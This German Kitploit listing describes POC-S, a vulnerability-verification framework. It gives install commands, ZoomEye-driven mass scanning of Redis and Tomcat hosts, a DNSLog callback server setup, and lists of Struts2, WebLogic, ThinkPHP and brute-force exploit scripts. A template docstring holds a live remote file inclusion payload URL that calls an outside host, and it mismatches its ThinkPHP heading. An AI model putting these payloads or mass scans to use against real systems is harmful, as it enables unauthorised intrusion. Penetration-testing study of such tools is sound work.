Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-S — POC-T-Erweiterungsversion POC-S, zur schnellen Verifizierung von Webanwendungs-Schwachstellen in Red-Blue-Team-Übungen, mit erweiterten Funktionen sowie kategorisiert hinzugefügten Skripten, inklusive integriertem dnslog usw. Die Plattform ergänzt hochverfügbare POCs aus vulhub-Zielumgebungen und anderen Open-Source-Projekten. | Kitploit
Tools/GitHubGitHub/jiangsir404/poc-s
AufklärungSchwachstellenscannerExploit-FrameworksInformationsbeschaffungWebsicherheitFuzzingPenetrationstestsDNS-Analyse
GitHubjiangsir404/poc-s

POC-S

Repository anzeigen
35664vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

POC-T-Erweiterungsversion POC-S, zur schnellen Verifizierung von Webanwendungs-Schwachstellen in Red-Blue-Team-Übungen, mit erweiterten Funktionen sowie kategorisiert hinzugefügten Skripten, inklusive integriertem dnslog usw. Die Plattform ergänzt hochverfügbare POCs aus vulhub-Zielumgebungen und anderen Open-Source-Projekten.

Teilen

POC-S: POC-T verbesserte Version

Die Wiki-Dokumentation von POC-T befindet sich im doc-Verzeichnis

Vorwort: Derzeit

Rechtlicher Haftungsausschluss

Ohne vorherige Zustimmung beider Parteien ist die Verwendung von POC-S zum Angriff auf ein Ziel illegal. POC-S dient ausschließlich Sicherheitstestzwecken.

Eigenschaften

  • Kompatibel mit der Syntax von POC-T
  • Gute Klassifizierung von PoCs, flexible PoC-Lademethoden, unterstützt Einzeldatei, Batch, beliebiges Verzeichnis laden
  • Bietet die Terminalbefehle pocs/poc-s, um das Framework und die PoCs zu trennen. Eigene PoCs können in beliebigen Verzeichnissen abgelegt werden
  • Bietet eine einfache DNS-Plattform, die nur eine Domain und eine öffentliche IP benötigt, um zu laufen. Kann für schnelle Verifizierung von Befehlsblind-SQL-Injection und SQL-Blind-Injection verwendet werden, einfach und effizient.
  • Bietet gute Unit-Test-Skripte

TODO

  • PoCs basierend auf Vulhub-Targets und Open-Source-Projekten sammeln und verbessern (siehe meine PoC-Kategorisierung)
  • --init-Parameter zum dynamischen Aktualisieren der tookit.conf-Konfigurationsdatei bereitstellen, z. B. --init zoomeye, initialisiert die Konfiguration von ZoomEye
  • DNSLog- und WebLog-Plattform zur schnellen Verifizierung von Schwachstellen hinzugefügt
  • Zwei Verifizierungs-Plugins ceye.py und dnslog.py hinzugefügt
  • pocsapi.py hinzufügen, ähnlich der Funktion von sqlmapapi
  • POC-S in Python-3-Version hinzufügen

Verwendung

Da Schnittstellen von Drittanbietern Authentifizierung benötigen, können Sie über den --init-Parameter Ihre entsprechenden Schnittstellenkonfigurationen initialisieren, z. B. --init zoomeye

root@kitploit:~
pip install pocs

Quellinstallation:

root@kitploit:~
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install

Wenn bei der Installation von POC-S mit pip ein Fehler wie "Some files missing" auftritt, gehen Sie zum Installationsverzeichnis von pocs (python2.7\Lib\site-packages\pocs) und benennen Sie tookit.conf um. Falls der Fehler WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments. auftritt, handelt es sich um ein Abhängigkeitsproblem. Bitte überprüfen und aktualisieren Sie die Versionen dieser Pakete: setuptools==39.0.1, cachetools==3.1.1, google-api-python-client==1.7.11

  1. Flexiblere Plugin-Lademethoden
root@kitploit:~
pocs -s test/test2.py -iS 127.0.0.1 # Lädt das Skript script/test/test2.py
pocs -s test2 -iS 127.0.0.1 # Lädt das Skript script/test2.py

pocs -b test -iS 127.0.0.1 # Batch-Laden aller Skripte im /script/test-Verzeichnis
pocs -b test -s test2.py -iS 127.0.0.1 # Lädt das Skript script/test/test2.py

pocs -s myself_script.py -iS 127.0.0.1 # Lädt eigene Skripte und Skriptverzeichnisse
pocs -b mydir -iS 127.0.0.1
  1. Nutzung von Suchmaschinen
root@kitploit:~
pocs --init zoomeye // Initialisiert die ZoomEye-Konfiguration
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"

Mit ZoomEye nach CNVD-2020-10487 Tomcat AJP LFI-Schwachstelle suchen

root@kitploit:~
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

  1. Verwendung der DNSLog-Plattform

Wenn Sie immer noch mit der Instabilität von ceye zu kämpfen haben und keine Zeit/Energie haben, eine DNSLog-Plattform aufzubauen (zwei Domänen, eine öffentliche IP, und die Domäne muss in der Lage sein, den DNS-Server zu ändern), dann probieren Sie doch die einfache DNSLog-Plattform von POC-S. Sie benötigen nur eine Domäne und eine öffentliche IP, um sie einzurichten. Sie bietet API-Schnittstellen zur Verifizierung (keine Benutzeroberfläche).

Angenommen, dnslog.xxx.cn ist Ihre öffentliche Domäne und x.x.x.x ist die öffentliche IP. Stellen Sie sicher, dass dnslog.xxx.cn korrekt auf x.x.x.x aufgelöst werden kann, da sonst der API-Zugriff nicht funktioniert. Führen Sie auf dem öffentlichen Server (x.x.x.x) den folgenden Befehl aus:

root@kitploit:~
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88 (Wenn nicht per pip installiert, führen Sie direkt das Skript pocs.dnslog.py aus)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x

DNS-Log-Befehl, unterstützt nur den Befehl nslookup: nslookup 1234.dnslog.xxx.cn x.x.x.x

Wenn Sie den Befehl ping 1234.dnslog.xxx.cn verwenden möchten, können Sie für die Domäne xxx.cn einen benutzerdefinierten DNS-Server konfigurieren (siehe Konfiguration von DNSLog).

Web-Log-Befehl: curl http://dnslog.xxx.cn:88/weblog/poc123

API-Endpunkt: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn Parameter: - token (erforderlich): Der bei der Einrichtung von DNSLog eingegebene API-Schlüssel - type (erforderlich): Mögliche Werte: dns/web - filter (optional): Filtert Einträge heraus (exakte Übereinstimmung)

POC

pocs bietet noch flexiblere Plugin-Kategorisierungsmöglichkeiten. Derzeit werden vier Arten von PoCs gesammelt: Fuzz PoC, OWASP PoC, Vuln PoC, Tool PoC. Es werden so viele PoCs wie möglich aus GitHub gesammelt, aber nicht zu viele – die individuelle Sammlung und Organisation bleibt Ihnen überlassen.

Die PoC-Erstellung sollte möglichst standardisiert erfolgen und dem Schreibstil von POC-T folgen. Beispiel:

root@kitploit:~
#!/usr/bin/env python		
#coding:utf-8

"""
ThinkPHP5 <=5.0.22/<=5.1.29 Remote Code Execution

Desc
    Am 10. Dezember 2018 veröffentlichte das offizielle ThinkPHP-Konto eine Aktualisierung, die eine hochriskante Schwachstelle in allen Versionen der 5.x-Reihe offenlegte.
    Aufgrund unzureichender Prüfung des Controllernamens kann es bei nicht aktiviertem erzwungenem Routing zu einer möglichen Getshell-Schwachstelle kommen.
    Betroffene Versionen sind alle vor 5.0.23 und 5.1.31. Es wird empfohlen, so schnell wie möglich auf die neueste Version zu aktualisieren.
Version
	ThinkPHP5.0 Version <= 5.0.22 ThinkPHP5.1 Version <= 5.1.29
Usage:
	1. python POC-S.py -s 
	2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
	https://www.seebug.org/vuldb/ssvid-9771
"""

import requests

def poc(url):
    pass

Vuln POC

Hauptsächlich von Vulhub-Plugins und den mitgelieferten Plugins von POC-T abgeleitet. Es werden nur hochverfügbare PoCs hinzugefügt. Die unten aufgeführten PoCs wurden fast alle in selbst eingerichteten Umgebungen getestet und als funktionsfähig befunden. Bei fehlerhaften PoCs kontaktieren Sie mich bitte über Issues.

  • struts2
    • s2-005.py
    • s2-015.py
    • s2-016.py
    • s2-032.py
    • s2-045.py
    • s2-052.py
    • s2-053.py
    • s2-057.py
    • struts2-devmode.py
  • weblogic
    • weblogic-ssrf-netmap.py cve-2014-4210
    • weblogc-cve-2017-10271.py (CVE-2017-10271)
    • weblogic-cve-2018-2628.py
    • weblogic-cve-2019-2725.py
    • weblogic-cve-2019-2729.py

Fuzz POC

Quelle: boy-hack/POC-T

  • bakfile: Erkennung von Backup-Dateien
  • crossdomain: crossdomain
  • dzxss
  • gitleak
  • issparse
  • ms15-034
  • phpinfo
  • phpmyadmin
  • svnleak
  • swf
  • tomcat_xmlleak
  • wordspace

OWASP POC

Quelle: Erkennungsskripte von Hunter

  • cmd_exec
  • sql_injection
  • xss
  • xxe
  • csrf
  • jsonp_xss
  • jsonp_hijacking
  • file_read
  • ssti
  • ssrf

Tool Poc

Einige gängige Tool-PoCs, die Suchmaschinen und Informationsabfragefunktionen bieten.

  • bing-dork Bing-Suche
  • bingc IP-Rückwärtssuche nach Domain, C-Bereichs-Domains basierend auf der Bing-Suchmaschine
  • google-dork Google-Suche
  • cdn-detect CDN-Erkennung
  • waf Erkennt WAF und gibt URLs ohne WAF zurück
  • craw Sammelt verwandte Adressen aus Links
  • vulscan Erkennt SQL-Injection-Schwachstellen
  • portscan Port-Scan, erkennt schwache Passwortdienste
  • domain2ip Domain-zu-IP-Abfrage
  • whois Whois-Informationen abfragen
  • icp ICP-Abfrage

Andere Open-Source-PoCs wie z. B. https://github.com/boy-hack/airbug sammeln einige direkt nutzbare PoCs, aber es gibt eine HackReqeust-Bibliothek in Python 3, die in Python 2 geändert werden muss. Sie können direkt meine angepasste py2-Bibliothek installieren: https://github.com/jiangsir404/hack-requests

Tool herunterladen
  • weblogic-cve-2020-2551.py
  • weblogic-upload-getshell.py (CVE-2018-2894)
  • thinkphp
    • 5-rce
    • 5.0.23-rce
  • Jenkins
    • jenkins-cve-2015-8103.py
    • jenkins-cve-2017-1000353.py
    • jenkins-cve-2018-1000861.py
  • weakpass
    • mysql
    • redis
    • mongo
    • sqlserver
    • ftp
    • telent
    • web-Schwachstellen-Kennwort (allgemein, ohne Captcha-Backend)
    • http-basic-auth
    • coremail
    • jboss
    • jenkins
    • weblogic
  • unauth
    • redis-unauth.py
    • mongodb-unauth.py
    • memcached-unauth.py
    • elasticsearch-unauth.py
    • kubernetes-unauth.py
    • jenkins-unauth.py
    • docker-unauth-rce.py
    • hadoop-unauth.py
  • apache
    • CNVD-2020-10487 tomcat-ajp-lfi.py
    • tomcat-upload.py
    • tomcat-weak-pass.py
  • Citrix
    • cve-2019-19781
  • supervisor
    • supervisord-RCE-CVE-2017-11610.py
  • Jboss
    • jboss-rce.py
    • CVE-2017-12149
    • CVE-2013-4810
  • spring
    • spring-oauth2-rce.py
    • cve-2018-1273
  • phpmyadmin
    • phpmyadmin-auth-rce.py
    • phpmyadmin4.8.1-RFI.py
  • kibana
    • cve-2019-7609
    • cve-2018-17246
  • php
    • fpm-rce.py
    • CVE-2019-11043
    • CVE-2018-19518
  • discuz
    • x3.4-arbitrary-file-deletion
  • zabbix
    • zabbix-jsrpc-mysql-exp.py
    • zabbix-jsrpc-sqli.py
    • zabbix-weakpass.py
    • zabbix_latest_sqli.py
  • dns-zone-transfer
  • confluence
    • confulence-traversal.py
    • confluence Pfad-Traversal und Befehlseinschleusung